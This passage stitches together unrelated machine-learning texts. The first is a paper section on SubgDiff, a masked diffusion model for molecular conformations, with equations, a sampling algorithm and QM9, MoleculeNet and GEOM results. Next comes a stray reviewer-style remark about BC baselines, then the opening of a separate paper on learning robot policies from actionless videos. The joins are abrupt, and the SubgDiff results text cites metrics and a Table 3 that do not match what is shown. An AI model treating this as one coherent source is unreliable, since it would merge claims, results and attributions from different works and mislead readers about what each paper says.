To simplify the notation, we consider the diffusion of a single node $v \in G_{3D}$ and omit the subscripts of the coordinate $R_v^t$ and $s_{tv}$ to obtain the notation $R^t$ and $s_t$. Defining $\gamma_t = 1 - s_t \beta_t$ and $\bar{\gamma}_t = \prod_{i=1}^{t} (1 - s_i \beta_i)$, the closed form of sampling $R^t$ from $R^0$ is $q(R^t|R^0) = \mathcal{N}(R^t; \sqrt{\bar{\gamma}_t}\, R^0, (1 - \bar{\gamma}_t) I)$. By Lemma 4.1, with $\mu_1 = \sqrt{1 - s_t \beta_t}$, $\sigma_1 = \sqrt{s_t \beta_t}$, $\mu_2 = \sqrt{\bar{\gamma}_{t-1}}$, $\sigma_2 = \sqrt{1 - \bar{\gamma}_{t-1}}$, the training objective of MaskedDiff is:

$$L(\theta) = \mathbb{E}_{t,R^0,s,\epsilon} \Big[\frac{s_t \beta_t}{2(1 - s_t \beta_t)(1 - \bar{\gamma}_{t-1})}\, \big\|\epsilon - \epsilon_\theta\big(\sqrt{\bar{\gamma}_t}\, R^0 + \sqrt{1 - \bar{\gamma}_t}\,\epsilon,\ t,\ G\big)\big\|_2^2\Big]. \tag{9}$$

Clearly, if $s_t = 0$ then $L(\theta) = 0$, which means that node $v$ is not trained at time step $t$. Therefore, $s_t$ also determines the substructure selected at time step $t$. One drawback of MaskedDiff is that it cannot be directly employed for sampling, since the mask series $(s_1, s_2, \cdots, s_T)$ needed to derive $\sigma_1$ and $\sigma_2$ in equation 7 is unavailable at generation time. The discussion of related work (MDM (Pan et al., 2023), MDSM (Lei et al., 2023), and SSSD (Alcaraz & Strodthoff, 2022)) is deferred to Appendix A.

### 4.3 SUBGDIFF: A DIFFUSION MODEL FOR REPRESENTATION LEARNING AND CONFORMATION GENERATION

In this section, we propose a novel diffusion model called SubgDiff for self-supervised representation learning and conformation generation. Inheriting from MaskedDiff, SubgDiff adopts the mask vector to embed substructure information into the denoising network $\epsilon_\theta$. The main problem, however, is that MaskedDiff cannot be used for generation. To solve this, SubgDiff applies multiple techniques that make it suitable for generation.

#### 4.3.1 MASK ESTIMATION

Recall that in the forward process of MaskedDiff, only a subgraph (substructure) of the molecular graph is chosen to diffuse at each time step. Correspondingly, during the reverse process, the mask is used to determine which subgraph needs to be denoised. This means that the sampling process will prioritize the subgraphs selected by the mask, which is also reflected in equation 7 (through $\sigma_1$ and $\sigma_2$). However, the mask series $(s_1, s_2, \cdots, s_T)$ cannot be accessed during sampling. This uncertainty makes it harder for the denoising network to capture the substructure. To estimate the mask series, SubgDiff uses a mask predictor to infer $s_t$ and adopts an expectation state to eliminate the effect of $(s_1, \cdots, s_{t-1})$.

**Mask Predictor.** Given the current time step $t$ in sampling, we need to infer the pivotal mask (subgraph) $s_t$ that highlights the subgraph of $G_{3D}(X, R^t)$ to be denoised to recover $R^{t-1}$.
Thus, we first introduce a mask predictor to estimate the mask vector $s_t$ during training (the theoretical motivation can be found in the Appendix). Consequently, the training objective of SubgDiff is:

$$L_{\text{simple}}(\theta, \vartheta) = \mathbb{E}_{t,R^0,s_t,\epsilon} \big[\|\mathrm{diag}(s_t)(\epsilon - \epsilon_\theta(G, R^t, t))\|^2 + \lambda\, \mathrm{BCE}(s_t, s_{\vartheta}(G, R^t, t))\big], \tag{10}$$

where $\mathrm{BCE}(s_t, s_{\vartheta}) = -\big[s_t \log s_{\vartheta}(G, R^t, t) + (1 - s_t) \log (1 - s_{\vartheta}(G, R^t, t))\big]$ is the binary cross-entropy loss and $\lambda$ is a trade-off weight. The mask predictor $s_{\vartheta}$ is implemented as a node classifier that takes $G_{3D}(G, R^t)$ as input and shares a molecule encoder with $\epsilon_\theta$; the BCE loss thus explicitly compels the denoising network to capture substructure information from the molecules. At sampling time, $s_{\vartheta}$ is used to infer the mask vector $\hat{s}_t = s_{\vartheta}(G, R^t, t)$.

**Expectation State Diffusion.** As mentioned above, MaskedDiff cannot be used for sampling due to the unknown mask series $(s_1, s_2, \cdots, s_t)$. We have designed a mask predictor to infer $s_t$. However, using another predictor to infer $(s_1, \cdots, s_{t-1})$ solely from $R^t$ is challenging due to the intricate modulation of noise introduced into $R^t$ through multi-step Gaussian processes. This complex modulation of noise in $R^t$ also heightens the challenge of predicting $s_t$, a critical factor in enhancing the denoising network's ability to discern substructures during self-supervised learning.

Recall the forward process of MaskedDiff: the state $R^{t-1} = \sqrt{\bar{\gamma}_{t-1}}\, R^0 + \sqrt{1 - \bar{\gamma}_{t-1}}\,\epsilon_0$ depends on $(s_1, \cdots, s_{t-1}, \epsilon_0)$. To eliminate the effect of the mask series, we use the mean state $\mathbb{E}_{s_{1:t-1}} R^{t-1}$ to estimate the state $R^{t-1}$. Assuming that for each node $v \in V$, $s_{tv} \sim \mathrm{Bern}(p)$ (i.i.d. w.r.t. $t$), $\mathbb{E}_{s_{1:t-1}} R^{t-1}$ can be formulated as:

$$\mathbb{E}_{s_{1:t-1}} R^{t-1} = \sqrt{\bar{\alpha}_{t-1}}\, R^0 + p \Big( \sum_{i=1}^{t-1} \frac{\bar{\alpha}_{t-1}}{\bar{\alpha}_i}\, \beta_i \Big)^{1/2} \epsilon_0, \tag{11}$$

where $\alpha_i := (p\sqrt{1 - \beta_i} + 1 - p)^2$ and $\bar{\alpha}_i := \prod_{j=1}^{i} \alpha_j$ are general forms of the $\alpha_i$ and $\bar{\alpha}_i$ in DDPM (recovered at $p = 1$). This estimation is reasonable since the expectation $\mathbb{E}_{s_{1:t-1}} R^{t-1}$ acts like a cluster center of $R^{t-1}$, which represents $R^{t-1}$ properly. Meanwhile, using the expectation reduces the complexity of $R^t$ for predicting the mask $s_t$ during training, which improves the denoising network's perception of the substructure when the diffusion model is used for pretraining. Eventually, we obtain a new forward process in which states $0$ to $t-1$ use $\mathbb{E}_{s_{1:t-1}} R^{t-1}$ and state $t$ remains as in MaskedDiff. Formally, we have $q(R^t | R^{t-1}) = \mathcal{N}(R^t; \sqrt{1 - s_t \beta_t}\, R^{t-1}, s_t \beta_t I)$ and $q(R^{t-1} | R^0) = q(\mathbb{E} R^{t-1} | R^0) = \mathcal{N}\big(\mathbb{E} R^{t-1};\ \sqrt{\bar{\alpha}_{t-1}}\, R^0,\ p^2 \sum_{i=1}^{t-1} \frac{\bar{\alpha}_{t-1}}{\bar{\alpha}_i} \beta_i\, I\big)$.
From Lemma 4.1, the training objective is equation 10 and the sampling process is:

$$R^{t-1} = \frac{1}{\sqrt{1 - \hat{s}_t \beta_t}} \Big(R^t - \frac{\hat{s}_t \beta_t}{\sqrt{\hat{s}_t \beta_t + (1 - \hat{s}_t \beta_t)\, p^2 \sum_{i=1}^{t-1} \frac{\bar{\alpha}_{t-1}}{\bar{\alpha}_i} \beta_i}}\, \epsilon_\theta(R^t, t)\Big) + \sigma_t z, \tag{12}$$

where $\hat{s}_t = s_\vartheta(R^t, t)$ and $\sigma_t = \Big(\frac{\hat{s}_t \beta_t \cdot p^2 \sum_{i=1}^{t-1} \frac{\bar{\alpha}_{t-1}}{\bar{\alpha}_i} \beta_i}{\hat{s}_t \beta_t + (1 - \hat{s}_t \beta_t)\, p^2 \sum_{i=1}^{t-1} \frac{\bar{\alpha}_{t-1}}{\bar{\alpha}_i} \beta_i}\Big)^{1/2}$.

#### 4.3.2 k-STEP SAME-MASK DIFFUSION

Although we can successfully use MaskedDiff for sampling with the expectation state and mask predictor, optimizing the mask predictor with equation 10 is still not trivial. Specifically, the mask predictor should be capable of perceiving the subtle noise change between time steps $t-1$ and $t$. However, the noise scale $\beta_t$ is relatively small when $t$ is small, especially if the number of diffusion steps exceeds a thousand. As a result, it is difficult to precisely predict the mask. To reduce the complexity of the mask series $(s_1, s_2, \cdots, s_T)$ and accumulate more noise on the same subgraph, SubgDiff generalizes one-step mask sampling to $k$-step mask sampling (Figure 5 in the Appendix), in which the selected subgraph is continuously diffused for $k$ steps. After that, the difference between the selected and unselected parts is distinct enough to help the mask predictor perceive it. The forward process of $k$-step same-mask diffusion can be written as ($t > k$, $k \in \mathbb{N}$):

$$q(R^t | R^{t-k}) = \mathcal{N}\Big(R^t;\ \sqrt{\prod_{i=t-k+1}^{t} (1 - s_{t-k+1} \beta_i)}\; R^{t-k},\ \Big(1 - \prod_{i=t-k+1}^{t} (1 - s_{t-k+1} \beta_i)\Big) I\Big). \tag{13}$$

#### 4.3.3 SUBGDIFF

With the $k$-step same-mask and mask-estimation techniques, we propose a novel diffusion model called SubgDiff. SubgDiff divides the entire diffusion process of $T$ steps into $T/k$ diffusion intervals. In each interval $[ki+1, k(i+1)]$, the mask vectors $\{s_j\}_{j=ki+1}^{k(i+1)}$ are all equal to $s_{ki+1}$. To eliminate the effect of $\{s_{ik+1} \mid i = 0, 1, 2, \ldots\}$ and obtain generative ability, SubgDiff also adopts the expectation state at the split time steps $\{ik \mid i = 1, 2, \ldots\}$, that is, it takes the expectation $\mathbb{E} R^{ik}$ at step $ik$ w.r.t. the interval masks. We therefore propose a new two-phase diffusion process: in the first phase, states $1$ to $k\lfloor t/k \rfloor$ use expectation-state diffusion, while in the second phase, states $k\lfloor t/k \rfloor + 1$ to $t$ use $k$-step same-mask diffusion. The state transitions are shown in Figure 4. With $m := \lfloor t/k \rfloor$, the two phases can be formulated as follows.

**Phase I:** Step $0 \rightarrow k\lfloor t/k \rfloor$:

$$\mathbb{E}_{s_{1:km}} R^{km} = \sqrt{\bar{\alpha}_m}\, R^0 + p \sqrt{\sum_{l=1}^{m} \frac{\bar{\alpha}_m}{\bar{\alpha}_l} \Big(1 - \prod_{i=(l-1)k+1}^{lk} (1 - \beta_i)\Big)}\; \epsilon_0,$$

where $\alpha_j = \big(p \sqrt{\prod_{i=(j-1)k+1}^{jk} (1 - \beta_i)} + 1 - p\big)^2$ is a general form of the $\alpha_j$ in equation 11 (which corresponds to $k = 1$) and $\bar{\alpha}_m = \prod_{j=1}^{m} \alpha_j$. In the rest of the paper, $\alpha_j$ denotes this general version unless stated otherwise. Note that $\mathbb{E}_{s_{1:km}} R^{km}$ only takes the expectation over the random variables $\{s_{ik+1} \mid i = 0, 1, 2, \ldots\}$.

**Phase II:** Step $k\lfloor t/k \rfloor + 1 \rightarrow t$: this phase is a $(t - km)$-step same-mask diffusion.
$$R^t = \sqrt{\prod_{i=km+1}^{t} (1 - s_{km+1}\beta_i)}\; \mathbb{E}_{s_{1:km}} R^{km} + \sqrt{1 - \prod_{i=km+1}^{t} (1 - s_{km+1}\beta_i)}\; \epsilon_{km}. \tag{14}$$

Let $\gamma_i = 1 - s_{km+1} \beta_i$ and $\bar{\gamma}_t = \prod_{i=km+1}^{t} \gamma_i$. We can derive the single-step state transition

$$q(R^t | R^{t-1}) = \mathcal{N}(R^t; \sqrt{\gamma_t}\, R^{t-1}, (1 - \gamma_t)I)$$

and the marginal

$$q(R^{t-1} | R^0) = \mathcal{N}\Big(R^{t-1};\ \sqrt{\bar{\gamma}_{t-1}\, \bar{\alpha}_m}\, R^0,\ \Big(\bar{\gamma}_{t-1}\, p^2 \sum_{l=1}^{m} \frac{\bar{\alpha}_m}{\bar{\alpha}_l} \Big(1 - \prod_{i=(l-1)k+1}^{lk} (1 - \beta_i)\Big) + 1 - \bar{\gamma}_{t-1}\Big) I\Big).$$

Then we can obtain $\mu_1, \sigma_1, \mu_2, \sigma_2$ in Lemma 4.1. Thus, the training objective of SubgDiff is:

$$L_{\text{simple}}(\theta, \vartheta) = \mathbb{E}_{t,R^0,s,\epsilon}\big[\|\mathrm{diag}(s_t)(\epsilon - \epsilon_\theta(G, R^t, t))\|^2 + \lambda\, \mathrm{BCE}(s_t, s_\vartheta(G, R^t, t))\big], \tag{15}$$

where $R^t$ is computed by equation 14. Because $s_\vartheta$ shares its encoder with $\epsilon_\theta$, when this objective is used for pretraining, $\epsilon_\theta$ is effectively trained to capture substructure information.

**Sampling.** The sampling process does not fully mirror the forward process: although the forward process takes the expectation state w.r.t. $s$, we only update the mask $\hat{s}_t$ when $t = ik$, $i = 1, 2, \ldots$. Denoting by $V_{t-1}$ the variance of $q(R^{t-1}|R^0)$ above and letting $\gamma_t = 1 - \hat{s}_{k\lfloor t/k \rfloor + 1}\beta_t$, Lemma 4.1 yields the sampling step

$$R^{t-1} = \frac{1}{\sqrt{\gamma_t}} \Big(R^t - \frac{1 - \gamma_t}{\sqrt{\gamma_t V_{t-1} + 1 - \gamma_t}}\, \epsilon_\theta(G, R^t, t)\Big) + \sqrt{\frac{(1 - \gamma_t)\, V_{t-1}}{\gamma_t V_{t-1} + 1 - \gamma_t}}\; z, \tag{16}$$

where $z \sim \mathcal{N}(0, I)$, $m = \lfloor t/k \rfloor$, and $\hat{s}_{km+1} = s_\vartheta(G, R^{km+1}, km + 1)$. The subgraph selected by $\hat{s}_{km+1}$ is generated preferentially. The mask predictor can be viewed as a discriminator of important subgraphs, indicating which subgraph should be recovered in the next $k$ steps. After the key subgraph (substructure) is generated properly, the model can gently fine-tune the remaining atoms (cf. the video in the supplementary material). This subgraph diffusion intuitively increases the robustness and generalization of the generation process, which is also verified by the experiments in Sec. 5.2. In contrast, DDPM (or GeoDiff) generates all atomic coordinates together, which is sub-optimal since some parts of the molecule should not be revised after being well generated. The training and sampling algorithms of SubgDiff are summarized in Alg. 1 and Alg. 2.

**Algorithm 2:** Sampling from SubgDiff
Sample $R^T \sim \mathcal{N}(0, I)$
for $t = T$ to $1$ do
  $z \sim \mathcal{N}(0, I)$ if $t > 1$, else $z = 0$
  if $t \bmod k == 0$ or $t == T$: $\hat{s} \leftarrow s_\vartheta(G, R^t, t)$ ▷ update the mask
  $\epsilon \leftarrow \epsilon_\theta(G, R^t, t)$ ▷ predict the noise
  $R^{t-1} \leftarrow$ equation 16 ▷ sampling
end for
return $R^0$

### 4.4 MASK DISTRIBUTION

As mentioned in Subsection 4.2, the subgraphs (mask vectors) sampled from the mask distribution should be connected. In this paper, we predefine the mask distribution as a discrete distribution with sample space $\chi = \{G_{\text{sub}}^i\}_{i=1}^N$ and $p_t(S = G_{\text{sub}}^i) = 1/N$, $t \geq 1$, where $G_{\text{sub}}^i$ is a subgraph produced by the torsional-based decomposition method (Jing et al., 2022).
The decomposition approach cuts one torsional edge of a 3D molecule, splitting the molecule into two components, each of which contains at least two atoms. The two components are represented as two complementary mask vectors (i.e., $s' + s = \mathbf{1}$). Thus, $n$ torsional edges in $G_{3D}$ generate $2n$ subgraphs. Finally, for each atom $v$, $s_{tv} \sim \mathrm{Bern}(0.5)$, i.e., $p = 0.5$ in SubgDiff.

## 5 EXPERIMENTS

We conduct experiments to address the following two questions: 1) Can substructure improve the representation ability of the denoising network during self-supervised learning? 2) Can SubgDiff outperform the conventional diffusion model in conformation generation? For the first question, we employ SubgDiff as a denoising pretraining task. For the second question, we compare SubgDiff with GeoDiff. We pay more attention to the first question.

Table 1: Results on 12 quantum mechanics prediction tasks from QM9. We take 110K molecules for training, 10K for validation, and 11K for testing. The evaluation metric is mean absolute error (MAE), and the best and second-best results are marked in bold and underlined, respectively. The backbone is SchNet.

| Pretraining | Alpha ↓ | Gap ↓ | HOMO ↓ | LUMO ↓ | Mu ↓ | Cv ↓ | G298 ↓ | H298 ↓ | R2 ↓ | U298 ↓ | U0 ↓ | Zpve ↓ |
|----------------------|---------|-------|--------|--------|------|------|--------|--------|------|--------|------|-------|
| Random init | 0.070 | 50.59 | 32.53 | 26.33 | 0.029| 0.032| 14.68 | 14.85 | 0.122| 14.70 | 14.44 | 1.698 |
| Supervised | 0.070 | 51.34 | 32.62 | 27.61 | 0.030| 0.032| 14.08 | 14.09 | 0.141| 14.13 | 13.25 | 1.727 |
| Type Prediction | 0.084 | 56.94 | 34.35 | 30.66 | 0.036| 0.038| 18.79 | 19.29 | 0.201| 19.29 | 18.86 | 2.001 |
| Angle Prediction | 0.084 | 57.01 | 37.57 | 30.92 | 0.037| 0.034| 15.81 | 15.89 | 0.164| 16.43 | 15.76 | 1.850 |
| 3D InfoGraph | 0.076 | 53.33 | 33.92 | 28.55 | 0.030| 0.032| 15.97 | 16.28 | 0.117| 16.17 | 15.96 | 1.666 |
| GeoSSL-RR | 0.073 | 52.57 | 34.44 | 28.41 | 0.033| 0.038| 15.74 | 16.11 | 0.194| 15.58 | 14.76 | 1.804 |
| GeoSSL-InfoNCE | 0.075 | 53.00 | 34.29 | 27.03 | 0.029| 0.033| 15.67 | 15.53 | 0.125| 15.79 | 14.94 | 1.675 |
| GeoSSL-EBM-NCE | 0.073 | 52.86 | 33.74 | 28.07 | 0.031| 0.032| 14.02 | 13.65 | 0.121| 13.70 | 13.45 | 1.677 |
| MoleculeSDE | 0.062 | 47.74 | 28.02 | 24.60 | 0.028| 0.029| 13.25 | 12.70 | 0.120| 12.68 | 12.93 | 1.643 |
| Ours | **0.054** | **44.88** | **25.45** | **23.75** | **0.027** | **0.028** | **12.03** | **11.46** | **0.110** | **11.32** | **11.25** | **1.568** |

### 5.1 MOLECULAR PROPERTY PREDICTION

This experiment aims to verify whether the mask introduced into the diffusion process can enhance the denoising network's perception of 3D molecular structure.

Table 2: Results for 2D molecular property prediction tasks (with 2D topology only). We report the mean (and standard deviation) ROC-AUC over three random seeds with scaffold splitting for each downstream task. The backbone is GIN. The best and second-best results are marked in bold and underlined, respectively.
| Pre-training | BBBP ↑ | Tox21 ↑ | ToxCast ↑ | Sider ↑ | ClinTox ↑ | MUV ↑ | HIV ↑ | Bace ↑ | Avg ↑ |
|----------------------|--------|---------|-----------|---------|-----------|-------|-------|-------|-------|
| (random init) | 68.1±0.59 | 75.3±0.22 | 62.1±0.19 | 57.0±1.33 | 83.7±2.93 | 74.6±2.35 | 75.2±0.70 | 76.7±2.51 | 71.60 |
| AttrMask | 65.0±2.36 | 74.8±0.25 | 62.9±0.11 | 61.2±0.12 | 87.7±1.19 | 73.4±2.02 | 76.8±0.53 | 79.7±0.33 | 72.68 |
| ContextPred | 65.7±0.62 | 74.2±0.06 | 62.5±0.31 | 62.2±0.59 | 77.2±0.88 | 75.3±1.57 | 77.1±0.86 | 76.0±2.08 | 71.28 |
| InfoGraph | 67.5±0.11 | 73.2±0.43 | 63.7±0.50 | 59.9±0.30 | 76.5±1.07 | 74.1±0.74 | 75.1±0.99 | 77.8±0.88 | 70.96 |
| MolCLR | 66.6±1.89 | 73.0±0.16 | 62.9±0.38 | 57.5±1.77 | 86.1±0.95 | 72.5±2.38 | 76.2±1.51 | 71.5±3.17 | 70.79 |
| 3D InfoMax | 68.3±1.12 | 76.1±0.18 | 64.8±0.25 | 60.6±0.78 | 79.9±3.49 | 74.4±2.45 | 75.9±0.59 | 79.7±1.54 | 72.47 |
| GraphMVP | 69.4±0.21 | 76.2±0.38 | 64.5±0.20 | 60.5±0.25 | 86.5±1.70 | 76.2±2.28 | 76.2±0.81 | 79.8±0.74 | 73.66 |
| MoleculeSDE (VE) | 68.3±0.25 | 76.9±0.23 | 64.7±0.06 | 60.2±0.29 | 80.8±2.53 | 76.8±1.71 | 77.0±1.68 | 79.9±1.76 | 73.15 |
| MoleculeSDE (VP) | 70.1±1.35 | 77.0±0.12 | 64.0±0.07 | 60.8±1.04 | 82.6±3.64 | 76.6±3.25 | 77.3±1.31 | 81.4±0.66 | 73.73 |
| Ours | **70.2±2.23** | **77.2±0.39** | **65.0±0.48** | **62.2±0.97** | **88.2±1.57** | **77.3±1.17** | **77.6±0.51** | **82.1±0.96** | **74.85** |

**Dataset and Settings.** For pretraining, we follow Liu et al. (2023a) and use PCQM4Mv2 (Hu et al., 2020b). It is a sub-dataset of PubChemQC (Nakata & Shimazaki, 2017) containing 3.4 million molecules with both geometric conformations and topological graphs. The downstream tasks are various molecular property predictions. For 3D fine-tuning, we take the QM9 dataset and follow the literature (Schütt et al., 2017; 2021; Liu et al., 2023a), using 110K molecules for training, 10K for validation, and 11K for testing. For 2D fine-tuning, we use eight 2D molecular property prediction tasks from MoleculeNet (Wu et al., 2017).

**Pretraining framework.** To explore the potential of the proposed method for self-supervised learning, we adopt MoleculeSDE (Liu et al., 2023a), a SOTA pretraining framework, as the training backbone for pretraining on 3D molecules, where SubgDiff serves as the $2D \rightarrow 3D$ model; for the $3D \rightarrow 2D$ direction, we simply extend SubgDiff to process the node features and graph adjacency. Details can be found in the Appendix.

**Baselines.** For 3D tasks, we include three coordinate-MI-unaware SSL methods: (1) Type Prediction, (2) Angle Prediction, and (3) 3D InfoGraph (Stärk et al., 2022), and two contrastive baselines: (4) GeoSSL-InfoNCE (Oord et al., 2018) and (5) GeoSSL-EBM-NCE (Liu et al., 2021). Additionally, we include two generative SSL baselines: (6) GeoSSL-RR (RR for Representation Reconstruction) and (7) MoleculeSDE (Liu et al., 2023a). For 2D tasks, we consider AttrMask (Hu et al., 2020a; Liu et al., 2019), ContextPred (Hu et al., 2020a), InfoGraph (Sun et al., 2020), MolCLR (Wang et al., 2022b), 3D InfoMax, vanilla GraphMVP (Liu et al., 2021), and MoleculeSDE. More details are given in Appendix F.1.

**Results.** The results in Table 1 and Table 2 show that SubgDiff outperforms MoleculeSDE on most downstream tasks, demonstrating that the introduced mask vector boosts the perception of molecular substructure in the denoising network during pretraining. Further, SubgDiff achieves SOTA performance compared to the baselines.
This also reveals that the proposed mask-based denoising objective is promising for molecular representation learning, owing to the prior knowledge of substructure involved during training.

Table 4: Results on the GEOM-QM9 dataset under different diffusion timesteps. DDPM (Ho et al., 2020) is the sampling method used in GeoDiff. Our proposed sampling method (Algorithm 2) can be viewed as a DDPM variant. ▲/▼ denotes that SubgDiff outperforms/underperforms GeoDiff. The threshold is δ = 0.5 Å.

| Models | Timesteps | Sampling method | COV-R Mean (%) ↑ | COV-R Median (%) ↑ | MAT-R Mean (Å) ↓ | MAT-R Median (Å) ↓ |
|------------|-----------|-----------------|-------------|-------------|-------------|-------------|
| GeoDiff | 5000 | DDPM | 80.36 | 83.82 | 0.2820 | 0.2799 |
| SubgDiff | 5000 | DDPM (ours) | 90.91▲ | 95.39▲ | 0.2460▲ | 0.2351▲ |
| GeoDiff | 500 | DDPM | 80.20 | 83.59 | 0.3617 | 0.3412 |
| SubgDiff | 500 | DDPM (ours) | 89.78▲ | 94.17▲ | 0.2417▲ | 0.2449▲ |
| GeoDiff | 200 | DDPM | 69.90 | 72.04 | 0.4222 | 0.4272 |
| SubgDiff | 200 | DDPM (ours) | 85.53▲ | 88.99▲ | 0.2994▲ | 0.3033▲ |

### 5.2 CONFORMATION GENERATION

To evaluate generation efficiency and quality, we conduct experiments with various numbers of time steps (5000, 500, and 200) to compare SubgDiff with GeoDiff.

**Dataset.** Following prior works (Xu et al., 2022; 2021a), we utilize the GEOM-QM9 (Ramakrishnan et al., 2014) and GEOM-Drugs (Axelrod & Gomez-Bombarelli, 2022) datasets. The former comprises small molecules with up to 9 heavy atoms, while the latter contains larger drug-like compounds. We reuse the data split provided by Xu et al. (2022). For both datasets, the training set comprises 40,000 molecules, each with 5 conformations, resulting in 200,000 conformations in total. The test split includes 200 distinct molecules, with 14,324 conformations for Drugs and 22,408 conformations for QM9.

**Denoising networks.** Following Xu et al. (2022), we use an equivariant convolutional network, GFN, as the denoising network for the conformation generation and self-supervised learning tasks. Descriptions of the evaluation metrics and model architecture are deferred to Appendix F.

**Results.** The results on the GEOM-QM9 dataset are reported in Table 4. We make the following observations: (1) SubgDiff significantly outperforms the baselines on COV-R and MAT-R, indicating that SubgDiff tends to explore more possible conformations. (2) SubgDiff consistently outperforms GeoDiff when adopting 200 and 500 sampling steps, demonstrating the competitive sampling efficiency of our method. Surprisingly, SubgDiff with 500 steps achieves much better performance than GeoDiff with 5000 steps on 5 out of 8 metrics, which implies our method can accelerate sampling by roughly 10×.

**Domain generalization.** We design two cross-domain tasks: (1) training on QM9 (small molecules with up to 9 heavy atoms) and testing on Drugs (medium-sized organic compounds); (2) training on Drugs and testing on QM9. The results are shown in Table 3 and Table 10 (in the Appendix), respectively. They suggest that SubgDiff consistently outperforms GeoDiff by a large margin, demonstrating that the introduced mask effectively enhances the robustness and generalization of the denoising network.

## 6 CONCLUSION

We first present a masked diffusion framework, which incorporates a subset constraint into the diffusion model by introducing a mask vector into the forward process.
The framework is model-agnostic and can be applied to any diffusion model built on Euclidean space. Further, a novel diffusion model, SubgDiff, is developed for molecular conformation generation and self-supervised representation learning. SubgDiff is the first diffusion method that fuses substructure information into training and sampling. Benefiting from the substructure, SubgDiff effectively boosts the perception of molecular substructure in the denoising network, thereby achieving state-of-the-art performance on conformation generation and 3D property prediction tasks. There are several exciting avenues for future work. The mask distribution is flexible enough that chemical prior knowledge can be incorporated for efficient subgraph sampling. Besides, the proposed SubgDiff can be generalized to proteins so that the denoising network can learn meaningful secondary structures.

ETHICS STATEMENT

In this work, we propose a novel diffusion model for molecular conformation generation and representation learning; no human subjects are involved.

REPRODUCIBILITY STATEMENT

We summarize the efforts made to ensure reproducibility in this work. (1) Datasets: we use the public QM9 dataset, whose processing details are included in Sec. 5 and Appendix F. (2) Model Training: we provide the training details (including hyper-parameter settings) in Appendix F.1, the training procedure in Algorithm 1, and the sampling procedure in Algorithm 2.
Mhb5fpA1T0
I am concerned by the reported results for the BC baseline. Since action data is available and the robot data is in-domain for the task, a simple BC or kNN baseline should work very well. There are many cases where the results are < 5% success. This should be addressed.
Learning to Act from Actionless Videos through Dense Correspondences

Po-Chen Ko† (National Taiwan University), Jiayuan Mao (MIT CSAIL), Yilun Du (MIT CSAIL), Shao-Hua Sun (National Taiwan University), Joshua B. Tenenbaum (MIT BCS, CBMM, CSAIL)

Abstract

In this work, we present an approach to construct a video-based robot policy capable of reliably executing diverse tasks across different robots and environments from a few video demonstrations, without using any action annotations. Our method leverages images as a task-agnostic representation, encoding both state and action information, and text as a general representation for specifying robot goals. By synthesizing videos that "hallucinate" a robot executing actions, in combination with dense correspondences between frames, our approach can infer the closed-form actions to execute in an environment without the need for any explicit action labels. This unique capability allows us to train the policy solely from RGB videos and deploy learned policies to various robotic tasks. We demonstrate the efficacy of our approach in learning policies for table-top manipulation and navigation tasks. Additionally, we contribute an open-source framework for efficient video modeling, enabling the training of high-fidelity policy models with four GPUs within a single day.

## 1 INTRODUCTION

A goal of robot learning is to construct a policy that can successfully and robustly execute diverse tasks across various robots and environments. A major obstacle is the diversity present in different robotic tasks. The state representation necessary to fold a cloth differs substantially from the one needed to pour water, pick and place objects, or navigate, requiring a policy that can process each state representation that arises. Furthermore, the action representation for executing each task varies significantly subject to differences in motor actuation, gripper shape, and task goals, requiring a policy that can correctly deduce an action to execute across different robots and tasks.

One approach to this issue is to use images as a task-agnostic method for encoding both the states and the actions to execute. In this setting, policy prediction involves synthesizing a video that depicts the actions a robot should execute (Finn & Levine, 2017; Kurutach et al., 2018; Du et al., 2023), enabling different states and actions to be encoded in a modality-agnostic manner. However, a predicted image representation of what a robot should do does not explicitly encode the robot actions required to execute it. To address this, past works either learn an action-conditioned video prediction model (Finn & Levine, 2017) or a task-specific inverse-dynamics model to predict actions from videos (Du et al., 2023). Both approaches rely on task-specific action labels, which can be expensive to collect in practice, preventing general policy prediction across different robot tasks.

This work presents a method that first synthesizes a video rendering the desired task execution and then directly regresses actions from the synthesized video, without requiring any action labels or a task-specific inverse-dynamics model, enabling us to directly formulate policy learning as a video generation problem. Our key insight is that action inference from video in many robotics tasks can be formulated as solving for a rigid 3D transform of objects or points in the generated video.
Such a transform can be robustly inferred using off-the-shelf optical flow and segmentation networks, and actions can then be executed from these transforms using off-the-shelf inverse kinematics and motion planners. We illustrate the efficacy of our method across various robotics tasks, ranging from table-top assembly and ego-centric object navigation to real-world robot manipulation, in Figure 1.

† Work done while Po-Chen Ko was a visiting student at MIT. Project page: https://flow-diffusion.github.io/

Another limitation of existing approaches that formulate policy prediction as a video prediction problem is their high computational cost during training, requiring the use of over 256 TPU pods (Du et al., 2023), with limited availability of the underlying source code. As a contribution, we provide an open-source codebase for training video policy models. Through a series of architectural optimizations, our framework enables the generation of high-fidelity videos for policy execution, with training accomplished on just 4 GPUs in a single day.

Concretely, this work contributes the following: (1) We propose a method to infer actions from video prediction without the need for any action labels by leveraging dense correspondences in a video. (2) We illustrate how this approach enables us to learn policies that can solve diverse tasks across both table-top manipulation and navigation. (3) We present an open-source framework for efficient video modeling that enables us to learn policies efficiently on 4 GPUs in a single day.

## 2 RELATED WORK

**Robot Learning from Videos.** A large body of work has explored how to leverage videos for robot learning (Sun et al., 2018; Pari et al., 2022; Nair et al., 2022; Shao et al., 2021; Chen et al., 2021; Bahl et al., 2022; Sharma et al., 2019; Lee & Ryoo, 2017; Du et al., 2023; Chethan et al., 2023; Karamcheti et al., 2023). One approach relies upon using existing video datasets to construct effective visual representations (Pari et al., 2022; Nair et al., 2022; Karamcheti et al., 2023). Alternatively, goal or subtask information for robotic execution may be extracted from videos (Shao et al., 2021; Chen et al., 2021; Chethan et al., 2023; Bahl et al., 2022; Sharma et al., 2019; Lee & Ryoo, 2017; Sivakumar et al., 2022), or videos may be used as a dynamics model for planning (Finn & Levine, 2017; Kurutach et al., 2018). The absence of rewards and action labels distinguishes our work from offline RL (Levine et al., 2020). Most similar to our work, UniPi (Du et al., 2023) formulates policy prediction directly as a text-conditioned video generation problem. Our approach extends UniPi and illustrates how dense correspondences enable action inference without any explicit action labels. Another work with a similar high-level idea to ours (Bharadhwaj et al., 2023) predicts hand poses from videos and uses them directly for control, while we infer actions from object-centric trajectories. While hand poses contain more details of manipulator-object interactions, object-centric actions may help cross-embodiment transfer.

**Leveraging Dense Correspondences.** Dense correspondences have emerged as an effective implicit parameterization of actions and poses (Florence et al., 2018; Manuelli et al., 2022; Yen-Chen et al., 2022; Simeonov et al., 2022; 2023; Chun et al., 2023; Sundaresan et al., 2020; Ryu et al., 2023).
